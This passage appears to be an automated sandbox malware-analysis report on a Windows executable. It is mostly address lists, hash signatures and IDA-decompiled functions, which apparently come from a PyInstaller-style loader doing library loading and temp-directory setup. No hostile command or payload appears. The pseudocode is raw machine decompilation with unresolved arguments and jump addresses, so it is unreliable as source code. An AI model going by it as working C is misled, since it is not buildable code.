                                                                                                                                                                                                                                                        0x7ff6e5ac95c7
                                                                                                                                                                                                                                                        0x7ff6e5ac95d4
                                                                                                                                                                                                                                                        0x7ff6e5ac95db
                                                                                                                                                                                                                                                        0x7ff6e5ac95e8
                                                                                                                                                                                                                                                        0x7ff6e5ac95ef
                                                                                                                                                                                                                                                        0x7ff6e5ac9606
                                                                                                                                                                                                                                                        0x7ff6e5ac9608
                                                                                                                                                                                                                                                        0x7ff6e5ac9615
                                                                                                                                                                                                                                                        0x7ff6e5ac961f
                                                                                                                                                                                                                                                        0x7ff6e5ac9621
                                                                                                                                                                                                                                                        0x7ff6e5ac962b
                                                                                                                                                                                                                                                        0x7ff6e5ac9630
                                                                                                                                                                                                                                                        0x7ff6e5ac9630
                                                                                                                                                                                                                                                        0x7ff6e5ac9633
                                                                                                                                                                                                                                                        0x7ff6e5ac9637
                                                                                                                                                                                                                                                        0x7ff6e5ac963f
                                                                                                                                                                                                                                                        0x7ff6e5ac9644
                                                                                                                                                                                                                                                        0x7ff6e5ac9647
                                                                                                                                                                                                                                                        0x7ff6e5ac964c
                                                                                                                                                                                                                                                        0x7ff6e5ac9652
                                                                                                                                                                                                                                                        0x7ff6e5ac9655
                                                                                                                                                                                                                                                        0x7ff6e5ac965b
                                                                                                                                                                                                                                                        0x7ff6e5ac965e
                                                                                                                                                                                                                                                        0x7ff6e5ac965e
                                                                                                                                                                                                                                                        0x7ff6e5ac9662
                                                                                                                                                                                                                                                        0x7ff6e5ac9665
                                                                                                                                                                                                                                                        0x7ff6e5ac966c
                                                                                                                                                                                                                                                        0x7ff6e5ac9671
                                                                                                                                                                                                                                                        0x7ff6e5ac9674
                                                                                                                                                                                                                                                        0x7ff6e5ac9678
                                                                                                                                                                                                                                                        0x7ff6e5ac967c
                                                                                                                                                                                                                                                        0x7ff6e5ac9682
                                                                                                                                                                                                                                                        0x7ff6e5ac9687
                                                                                                                                                                                                                                                        0x7ff6e5ac9689
                                                                                                                                                                                                                                                        0x7ff6e5ac968e
                                                                                                                                                                                                                                                        0x7ff6e5ac9694
                                                                                                                                                                                                                                                        0x7ff6e5ac9699
                                                                                                                                                                                                                                                        0x7ff6e5ac96a4
                                                                                                                                                                                                                                                        0x7ff6e5ac96af
                                                                                                                                                                                                                                                        0x7ff6e5ac96b2
                                                                                                                                                                                                                                                        0x7ff6e5ac96b8
                                                                                                                                                                                                                                                        0x7ff6e5ac96b8
                                                                                                                                                                                                                                                        0x7ff6e5ac96c0
                                                                                                                                                                                                                                                        0x7ff6e5ac96ca
                                                                                                                                                                                                                                                        0x7ff6e5ac96d2
                                                                                                                                                                                                                                                        0x7ff6e5ac96d7
                                                                                                                                                                                                                                                        0x7ff6e5ac96db
                                                                                                                                                                                                                                                        0x7ff6e5ac96db
                                                                                                                                                                                                                                                        0x7ff6e5ac96df
                                                                                                                                                                                                                                                        0x7ff6e5ac96ea
                                                                                                                                                                                                                                                        0x7ff6e5ac96ee
                                                                                                                                                                                                                                                        0x7ff6e5ac96f1
                                                                                                                                                                                                                                                        0x7ff6e5ac96f3
                                                                                                                                                                                                                                                        0x7ff6e5ac96fb
                                                                                                                                                                                                                                                        0x7ff6e5ac9701
                                                                                                                                                                                                                                                        0x7ff6e5ac970a
                                                                                                                                                                                                                                                        0x7ff6e5ac9718
                                                                                                                                                                                                                                                        0x7ff6e5ac971f
                                                                                                                                                                                                                                                        0x7ff6e5ac972c
                                                                                                                                                                                                                                                        0x7ff6e5ac9732
                                                                                                                                                                                                                                                        0x7ff6e5ac9738
                                                                                                                                                                                                                                                        0x7ff6e5ac973f
                                                                                                                                                                                                                                                        0x7ff6e5ac974c
                                                                                                                                                                                                                                                        0x7ff6e5ac9752
                                                                                                                                                                                                                                                        0x7ff6e5ac9758
                                                                                                                                                                                                                                                        0x7ff6e5ac975a
                                                                                                                                                                                                                                                        0x7ff6e5ac9760
                                                                                                                                                                                                                                                        0x7ff6e5ac9766
                                                                                                                                                                                                                                                        0x7ff6e5ac976c
                                                                                                                                                                                                                                                        0x7ff6e5ac976e
                                                                                                                                                                                                                                                        0x7ff6e5ac9774
                                                                                                                                                                                                                                                        0x7ff6e5ac9782
                                                                                                                                                                                                                                                        0x7ff6e5ac978b
                                                                                                                                                                                                                                                        0x7ff6e5ac9796
                                                                                                                                                                                                                                                        0x7ff6e5ac979f
                                                                                                                                                                                                                                                        0x7ff6e5ac97aa
                                                                                                                                                                                                                                                        0x7ff6e5ac97b3
                                                                                                                                                                                                                                                        0x7ff6e5ac97be
                                                                                                                                                                                                                                                        0x7ff6e5ac97cb
                                                                                                                                                                                                                                                        0x7ff6e5ac97d6
                                                                                                                                                                                                                                                        0x7ff6e5ac97e3
                                                                                                                                                                                                                                                        0x7ff6e5ac97ee
                                                                                                                                                                                                                                                        0x7ff6e5ac97fb
                                                                                                                                                                                                                                                        0x7ff6e5ac9806
                                                                                                                                                                                                                                                        0x7ff6e5ac9813
                                                                                                                                                                                                                                                        0x7ff6e5ac981a
                                                                                                                                                                                                                                                        0x7ff6e5ac9827
                                                                                                                                                                                                                                                        0x7ff6e5ac982e
                                                                                                                                                                                                                                                        0x7ff6e5ac983b
                                                                                                                                                                                                                                                        0x7ff6e5ac9842
                                                                                                                                                                                                                                                        0x7ff6e5ac984f
                                                                                                                                                                                                                                                        0x7ff6e5ac9856
                                                                                                                                                                                                                                                        0x7ff6e5ac986d
                                                                                                                                                                                                                                                        0x7ff6e5ac9874
                                                                                                                                                                                                                                                        0x7ff6e5ac987e
                                                                                                                                                                                                                                                        0x7ff6e5ac9889
                                                                                                                                                                                                                                                        0x7ff6e5ac988b
                                                                                                                                                                                                                                                        0x7ff6e5ac9891
                                                                                                                                                                                                                                                        0x7ff6e5ac9896
                                                                                                                                                                                                                                                        0x7ff6e5ac989b
                                                                                                                                                                                                                                                        0x7ff6e5ac98a1
                                                                                                                                                                                                                                                        0x7ff6e5ac98b2
                                                                                                                                                                                                                                                        0x7ff6e5ac98ba
                                                                                                                                                                                                                                                        0x7ff6e5ac98bf
                                                                                                                                                                                                                                                        0x7ff6e5ac98c5
                                                                                                                                                                                                                                                        0x7ff6e5ac98c7
                                                                                                                                                                                                                                                        0x7ff6e5ac98d2
                                                                                                                                                                                                                                                        0x7ff6e5ac98e3
                                                                                                                                                                                                                                                        0x7ff6e5ac98eb
                                                                                                                                                                                                                                                        0x7ff6e5ac98f5
                                                                                                                                                                                                                                                        0x7ff6e5ac98f8
                                                                                                                                                                                                                                                        0x7ff6e5ac98fa
                                                                                                                                                                                                                                                        0x7ff6e5ac98ff
                                                                                                                                                                                                                                                        0x7ff6e5ac9907
                                                                                                                                                                                                                                                        0x7ff6e5ac9907
                                                                                                                                                                                                                                                        0x7ff6e5ac990b
                                                                                                                                                                                                                                                        0x7ff6e5ac9918
                                                                                                                                                                                                                                                        0x7ff6e5ac991e
                                                                                                                                                                                                                                                        0x7ff6e5ac9923
                                                                                                                                                                                                                                                        0x7ff6e5ac9925
                                                                                                                                                                                                                                                        0x7ff6e5ac992a
                                                                                                                                                                                                                                                        0x7ff6e5ac9930
                                                                                                                                                                                                                                                        0x7ff6e5ac9939
                                                                                                                                                                                                                                                        0x7ff6e5ac993b
                                                                                                                                                                                                                                                        0x7ff6e5ac993f
                                                                                                                                                                                                                                                        0x7ff6e5ac9945
                                                                                                                                                                                                                                                        0x7ff6e5ac9947
                                                                                                                                                                                                                                                        0x7ff6e5ac994c
                                                                                                                                                                                                                                                        0x7ff6e5ac9951
                                                                                                                                                                                                                                                        0x7ff6e5ac9957
                                                                                                                                                                                                                                                        0x7ff6e5ac9957
                                                                                                                                                                                                                                                        0x7ff6e5ac995f
                                                                                                                                                                                                                                                        0x7ff6e5ac9968
                                                                                                                                                                                                                                                        0x7ff6e5ac996e
                                                                                                                                                                                                                                                        0x7ff6e5ac9973
                                                                                                                                                                                                                                                        0x7ff6e5ac9978
                                                                                                                                                                                                                                                        0x7ff6e5ac997a
                                                                                                                                                                                                                                                        0x7ff6e5ac997f
                                                                                                                                                                                                                                                        0x7ff6e5ac998a
                                                                                                                                                                                                                                                        0x7ff6e5ac998f
                                                                                                                                                                                                                                                        0x7ff6e5ac9999
                                                                                                                                                                                                                                                        0x7ff6e5ac999b
                                                                                                                                                                                                                                                        0x7ff6e5ac999f
                                                                                                                                                                                                                                                        0x7ff6e5ac99a1
                                                                                                                                                                                                                                                        0x7ff6e5ac99a7
                                                                                                                                                                                                                                                        0x7ff6e5ac99ac
                                                                                                                                                                                                                                                        0x7ff6e5ac99b1
                                                                                                                                                                                                                                                        0x7ff6e5ac99b7
                                                                                                                                                                                                                                                        0x7ff6e5ac99bc
                                                                                                                                                                                                                                                        0x7ff6e5ac99c1
                                                                                                                                                                                                                                                        0x7ff6e5ac99c7
                                                                                                                                                                                                                                                        0x7ff6e5ac99cc
                                                                                                                                                                                                                                                        0x7ff6e5ac99ce
                                                                                                                                                                                                                                                        0x7ff6e5ac99d1
                                                                                                                                                                                                                                                        0x7ff6e5ac99d8
                                                                                                                                                                                                                                                        0x7ff6e5ac99dd
                                                                                                                                                                                                                                                        0x7ff6e5ac99fd

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: f$p$p
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1995029353
                                                                                                                                                                                                                                                        • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                                                                                        • Instruction ID: 9fb8f15f72184e8703be9ab42d757054ca2034e10b1cf7b2171d584ef6463102
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A126C63B0C1428AFB349A19D1643B97695EF80F54F844035E69ACB6C4DF3EFD908B1A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                                                        • API String ID: 626452242-876015163
                                                                                                                                                                                                                                                        • Opcode ID: 75ada23d093b76e5b35e8a216d6a7c66ee7d2317080e6440cd66e03fb4978861
                                                                                                                                                                                                                                                        • Instruction ID: c550e4de5a89579bc87568d6f87d297574229080f8cbfb87275eee981baa1d8c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ada23d093b76e5b35e8a216d6a7c66ee7d2317080e6440cd66e03fb4978861
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7418E33B08B4682E650EF19A46027967A5FF44B94F544135DE4DC7BA8EF3DD8128B09
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ABCEE8(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                                                                        				intOrPtr _t65;
                                                                                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                                                                                        				struct HINSTANCE__* _t81;
                                                                                                                                                                                                                                                        				long long _t85;
                                                                                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                                                                                        				struct HINSTANCE__* _t94;
                                                                                                                                                                                                                                                        				long _t97;
                                                                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                                                                        				signed long long _t101;
                                                                                                                                                                                                                                                        				WCHAR* _t104;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				 *((long long*)(_t89 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t89 + 0x10)) = _t85;
                                                                                                                                                                                                                                                        				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				_t101 = _t100 | 0xffffffff;
                                                                                                                                                                                                                                                        				_t61 =  *((intOrPtr*)(0x7ff6e5ab0000 + 0x4c720 + _t81 * 8));
                                                                                                                                                                                                                                                        				if (_t61 == _t101) goto 0xe5abd017;
                                                                                                                                                                                                                                                        				if (_t61 != 0) goto 0xe5abd019;
                                                                                                                                                                                                                                                        				if (__r8 == __r9) goto 0xe5abd00f;
                                                                                                                                                                                                                                                        				_t67 =  *((intOrPtr*)(0x7ff6e5ab0000 + 0x4c708 + __rsi * 8));
                                                                                                                                                                                                                                                        				if (_t67 == 0) goto 0xe5abcf5a;
                                                                                                                                                                                                                                                        				if (_t67 != _t101) goto 0xe5abcff1;
                                                                                                                                                                                                                                                        				goto 0xe5abcfc5;
                                                                                                                                                                                                                                                        				r8d = 0x800;
                                                                                                                                                                                                                                                        				LoadLibraryExW(_t104, _t100, _t97);
                                                                                                                                                                                                                                                        				_t68 = _t61;
                                                                                                                                                                                                                                                        				if (_t61 != 0) goto 0xe5abcfd1;
                                                                                                                                                                                                                                                        				if (GetLastError() != 0x57) goto 0xe5abcfb3;
                                                                                                                                                                                                                                                        				_t14 = _t68 + 7; // 0x7
                                                                                                                                                                                                                                                        				r8d = _t14;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC9A00(__r8) == 0) goto 0xe5abcfb3;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				LoadLibraryExW(??, ??, ??);
                                                                                                                                                                                                                                                        				if (_t61 != 0) goto 0xe5abcfd1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(0x7ff6e5ab0000 + 0x4c708 + __rsi * 8)) = _t101;
                                                                                                                                                                                                                                                        				goto 0xe5abcf38;
                                                                                                                                                                                                                                                        				_t21 = 0x7ff6e5ab0000 + 0x4c708 + __rsi * 8;
                                                                                                                                                                                                                                                        				_t65 =  *_t21;
                                                                                                                                                                                                                                                        				 *_t21 = _t61;
                                                                                                                                                                                                                                                        				if (_t65 == 0) goto 0xe5abcff1;
                                                                                                                                                                                                                                                        				FreeLibrary(_t94);
                                                                                                                                                                                                                                                        				GetProcAddress(_t81);
                                                                                                                                                                                                                                                        				if (_t65 == 0) goto 0xe5abd00f;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(0x7ff6e5ab0000 + 0x4c720 + _t81 * 8)) = _t65;
                                                                                                                                                                                                                                                        				goto 0xe5abd019;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(0x7ff6e5ab0000 + 0x4c720 + _t81 * 8)) = _t101;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                        0x7ff6e5abcee8
                                                                                                                                                                                                                                                        0x7ff6e5abceed
                                                                                                                                                                                                                                                        0x7ff6e5abcef2
                                                                                                                                                                                                                                                        0x7ff6e5abcf0d
                                                                                                                                                                                                                                                        0x7ff6e5abcf1a
                                                                                                                                                                                                                                                        0x7ff6e5abcf26
                                                                                                                                                                                                                                                        0x7ff6e5abcf2f
                                                                                                                                                                                                                                                        0x7ff6e5abcf38
                                                                                                                                                                                                                                                        0x7ff6e5abcf41
                                                                                                                                                                                                                                                        0x7ff6e5abcf4d
                                                                                                                                                                                                                                                        0x7ff6e5abcf52
                                                                                                                                                                                                                                                        0x7ff6e5abcf58
                                                                                                                                                                                                                                                        0x7ff6e5abcf67
                                                                                                                                                                                                                                                        0x7ff6e5abcf6d
                                                                                                                                                                                                                                                        0x7ff6e5abcf73
                                                                                                                                                                                                                                                        0x7ff6e5abcf79
                                                                                                                                                                                                                                                        0x7ff6e5abcf84
                                                                                                                                                                                                                                                        0x7ff6e5abcf86
                                                                                                                                                                                                                                                        0x7ff6e5abcf86
                                                                                                                                                                                                                                                        0x7ff6e5abcf9b
                                                                                                                                                                                                                                                        0x7ff6e5abcf9d
                                                                                                                                                                                                                                                        0x7ff6e5abcfa5
                                                                                                                                                                                                                                                        0x7ff6e5abcfb1
                                                                                                                                                                                                                                                        0x7ff6e5abcfbd
                                                                                                                                                                                                                                                        0x7ff6e5abcfcc
                                                                                                                                                                                                                                                        0x7ff6e5abcfdb
                                                                                                                                                                                                                                                        0x7ff6e5abcfdb
                                                                                                                                                                                                                                                        0x7ff6e5abcfdb
                                                                                                                                                                                                                                                        0x7ff6e5abcfe6
                                                                                                                                                                                                                                                        0x7ff6e5abcfeb
                                                                                                                                                                                                                                                        0x7ff6e5abcff7
                                                                                                                                                                                                                                                        0x7ff6e5abd000
                                                                                                                                                                                                                                                        0x7ff6e5abd005
                                                                                                                                                                                                                                                        0x7ff6e5abd00d
                                                                                                                                                                                                                                                        0x7ff6e5abd00f
                                                                                                                                                                                                                                                        0x7ff6e5abd035

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6E5ABD19A,?,?,?,00007FF6E5ABCE8C,?,?,00000001,00007FF6E5ABCAA9), ref: 00007FF6E5ABCF6D
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6E5ABD19A,?,?,?,00007FF6E5ABCE8C,?,?,00000001,00007FF6E5ABCAA9), ref: 00007FF6E5ABCF7B
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6E5ABD19A,?,?,?,00007FF6E5ABCE8C,?,?,00000001,00007FF6E5ABCAA9), ref: 00007FF6E5ABCFA5
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6E5ABD19A,?,?,?,00007FF6E5ABCE8C,?,?,00000001,00007FF6E5ABCAA9), ref: 00007FF6E5ABCFEB
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6E5ABD19A,?,?,?,00007FF6E5ABCE8C,?,?,00000001,00007FF6E5ABCAA9), ref: 00007FF6E5ABCFF7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                        • Opcode ID: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                                                                                                                                                                                                                        • Instruction ID: 14fb6705d68bfe41e19114bc4b4066e0eaf510de338a4abfa2a332326a926d05
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F31C733B0A74691EE91AB1A9420B7523D4FF08F64F454535EE1EC6344EF3DE8458749
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB6480(void* __edx, void* __rax, long long __rbx, void* __rcx, void* __r8, char _a24, char _a8216, signed int _a16408, long long _a16448) {
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                                                                        				signed long long _t52;
                                                                                                                                                                                                                                                        				signed long long _t53;
                                                                                                                                                                                                                                                        				long long _t55;
                                                                                                                                                                                                                                                        				signed long long _t79;
                                                                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                                                                                        				void* _t93;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t86 = __r8;
                                                                                                                                                                                                                                                        				_t55 = __rbx;
                                                                                                                                                                                                                                                        				_t36 = __edx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABADB0(0x4030, __rax, _t92, _t93);
                                                                                                                                                                                                                                                        				_t84 = _t83 - __rax;
                                                                                                                                                                                                                                                        				_t52 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t53 = _t52 ^ _t83 - __rax;
                                                                                                                                                                                                                                                        				_a16408 = _t53;
                                                                                                                                                                                                                                                        				_t74 = __rcx;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t53, __rbx, __rcx, __rcx, _t81, __r8);
                                                                                                                                                                                                                                                        				if (_t53 != 0) goto 0xe5ab64c9;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2770(_t53, "LOADER: Failed to convert runtime-tmpdir to a wide string.\n", _t74, _t86, _t91);
                                                                                                                                                                                                                                                        				goto 0xe5ab65d8;
                                                                                                                                                                                                                                                        				r8d = 0x1000;
                                                                                                                                                                                                                                                        				_a16448 = _t55;
                                                                                                                                                                                                                                                        				_t18 = ExpandEnvironmentStringsW(??, ??, ??);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0, _t53,  &_a24, _t86);
                                                                                                                                                                                                                                                        				if (_t18 != 0) goto 0xe5ab6506;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2770(_t53, "LOADER: Failed to expand environment variables in the runtime-tmpdir.\n",  &_a24, _t86, _t91);
                                                                                                                                                                                                                                                        				goto 0xe5ab65d0;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AB77A0(_t55,  &_a24) == 0) goto 0xe5ab6520;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC5F44(_t53, _t55,  &_a24, _t81, _t82);
                                                                                                                                                                                                                                                        				goto 0xe5ab6532;
                                                                                                                                                                                                                                                        				r8d = 0x1000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC5348(0, _t36, _t53, _t55,  &_a24,  &_a24, _t53, _t81, _t86);
                                                                                                                                                                                                                                                        				if (_t53 != 0) goto 0xe5ab654d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2770(_t53, "LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\n",  &_a24, _t86, _t91);
                                                                                                                                                                                                                                                        				goto 0xe5ab65d0;
                                                                                                                                                                                                                                                        				r8d = 0x2000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC754(0x5c, _t53, _t91);
                                                                                                                                                                                                                                                        				_t79 = _t53;
                                                                                                                                                                                                                                                        				if (_t53 == 0) goto 0xe5ab65c2;
                                                                                                                                                                                                                                                        				asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC5FC8(_t42, _t43,  &_a8216, _t53, _t79, (_t79 - _t53 >> 1) + 1);
                                                                                                                                                                                                                                                        				CreateDirectoryW(??, ??);
                                                                                                                                                                                                                                                        				_t10 = _t79 + 2; // 0x2
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC754(0x5c, _t10, _t91);
                                                                                                                                                                                                                                                        				if (_t53 != 0) goto 0xe5ab6580;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(CreateDirectoryW(??, ??), 0, _a16408 ^ _t84);
                                                                                                                                                                                                                                                        			}


















                                                                                                                                                                                                                                                        0x7ff6e5ab6480
                                                                                                                                                                                                                                                        0x7ff6e5ab6480
                                                                                                                                                                                                                                                        0x7ff6e5ab6480
                                                                                                                                                                                                                                                        0x7ff6e5ab6487
                                                                                                                                                                                                                                                        0x7ff6e5ab648c
                                                                                                                                                                                                                                                        0x7ff6e5ab648f
                                                                                                                                                                                                                                                        0x7ff6e5ab6496
                                                                                                                                                                                                                                                        0x7ff6e5ab6499
                                                                                                                                                                                                                                                        0x7ff6e5ab64a1
                                                                                                                                                                                                                                                        0x7ff6e5ab64a4
                                                                                                                                                                                                                                                        0x7ff6e5ab64a9
                                                                                                                                                                                                                                                        0x7ff6e5ab64b4
                                                                                                                                                                                                                                                        0x7ff6e5ab64bd
                                                                                                                                                                                                                                                        0x7ff6e5ab64c4
                                                                                                                                                                                                                                                        0x7ff6e5ab64c9
                                                                                                                                                                                                                                                        0x7ff6e5ab64cf
                                                                                                                                                                                                                                                        0x7ff6e5ab64df
                                                                                                                                                                                                                                                        0x7ff6e5ab64ea
                                                                                                                                                                                                                                                        0x7ff6e5ab64f1
                                                                                                                                                                                                                                                        0x7ff6e5ab64fa
                                                                                                                                                                                                                                                        0x7ff6e5ab6501
                                                                                                                                                                                                                                                        0x7ff6e5ab6512
                                                                                                                                                                                                                                                        0x7ff6e5ab6519
                                                                                                                                                                                                                                                        0x7ff6e5ab651e
                                                                                                                                                                                                                                                        0x7ff6e5ab6520
                                                                                                                                                                                                                                                        0x7ff6e5ab652d
                                                                                                                                                                                                                                                        0x7ff6e5ab6538
                                                                                                                                                                                                                                                        0x7ff6e5ab6541
                                                                                                                                                                                                                                                        0x7ff6e5ab6548
                                                                                                                                                                                                                                                        0x7ff6e5ab6557
                                                                                                                                                                                                                                                        0x7ff6e5ab655d
